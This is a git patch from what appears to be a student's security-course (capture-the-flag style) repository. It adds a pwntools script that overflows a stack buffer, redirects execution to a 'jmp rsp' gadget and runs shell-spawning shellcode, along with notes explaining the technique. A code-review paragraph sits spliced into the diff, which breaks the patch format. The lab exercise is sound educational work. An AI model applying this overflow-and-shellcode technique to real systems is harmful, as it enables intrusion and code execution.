From 214eac87192355c97a2c5941f44310f198e14907 Mon Sep 17 00:00:00 2001
From: Kaushik Narayan R
Date: Tue, 29 Oct 2024 14:55:46 -0700
Subject: [PATCH] lab 4b.3 - some more shellcode
---
 4b/lab4b_3.py | 64 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Dojo Notes.md | 14 ++++++++++-
 2 files changed, 77 insertions(+), 1 deletion(-)
 create mode 100644 4b/lab4b_3.py
diff --git a/4b/lab4b_3.py b/4b/lab4b_3.py
new file mode 100644
index 0000000..d57ff44
--- /dev/null
+++ b/4b/lab4b_3.py
@@ -0,0 +1,64 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template /challenge/run
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or "/challenge/run")
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+def start(argv=[], *a, **kw):
+    """Start the exploit against the target."""
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = """
+b vuln
+continue
+""".format(
+    **locals()
+)
+
+# ===========================================================
+# EXPLOIT GOES HERE
+# ===========================================================
+# Arch: amd64-64-little
+# RELRO: No RELRO
+# Stack: No canary found
+# NX: NX unknown - GNU_STACK missing
+# PIE: No PIE (0x400000)
+# Stack: Executable
+# RWX: Has RWX segments
+
+io = start()
+
+target_fn = 0x401146
+
+unbound_buffer = 0x7FFDE3E76C00
+saved_rip = 0x7FFDE3E76C48
+offset = saved_rip - unbound_buffer
+
+payload_padding = b"F" * offset # pad until saved_rip
+payload_rip = p64(target_fn) # in this challenge, we target the jmp rsp code
+payload_shellcode = asm(shellcraft.sh()) # from pwn
+payload = payload_padding + payload_rip + payload_shellcode + b"\n"
+
+io.send(payload)
+print("[>>>] Sending payload...")
+
+# root shell gained
+io.send(b"cat /flag \n")
+
+io.interactive()
diff --git a/Dojo Notes.md b/Dojo Notes.md
index 952de77..97117c5 100644
--- a/Dojo Notes.md
+++ b/Dojo Notes.md
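Review bot: `def start(argv=[], *a, **kw)` uses a mutable default argument; `argv` is never mutated here (`[exe.path] + argv` builds a fresh list), so it is harmless today, but the idiomatic form is `def start(argv=None, *a, **kw):` with `argv = [] if argv is None else argv` as the first statement. The `gdbscript` literal contains no `{}` placeholders, so the `.format(**locals())` call is a no-op left over from the template and will raise `KeyError` the moment someone adds a brace to the script; `gdbscript = """\nb vuln\ncontinue\n"""` is sufficient. Only the difference `saved_rip - unbound_buffer` (0x48) is ever used, and the two absolute stack addresses appear to be specific to the run they were captured from, so a comment on `unbound_buffer` such as `# addresses captured from one debugging run; only their difference is load-bearing` would stop the next reader from treating the absolute values as meaningful. `print("[>>>] Sending payload...")` executes after `io.send(payload)`, so the log line is out of order; move it above the send.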
@@ -453,7 +453,7 @@ done ### .26 - arg wars V - the system strikes back -- pipe symbol now added to filter +- pipe symbol now added to filter - luckily we didn't use that ### .27 - overflow gods @@ -479,3 +479,15 @@ done - even more direct access - no addition of address, just direct address control (lol) - set flag to `0xdeadfeed` + +### lab 4b.3 - overflow + a defense + +- similar to 4b.1 and 4b.2 +- but here we dont have RSP so we cant point RIP to it +- instead there's a function that has `jmp *%rsp` +- so first, pad the vulnerable stack buffer upto the saved RIP's address +- put that function's address in it +- now, remember that when a function returns, it pops its stack +- so we need to put our shellcode after this saved RIP's location +- that way, when the current function returns into the target function, the target function's RSP will point to the shellcode +- boom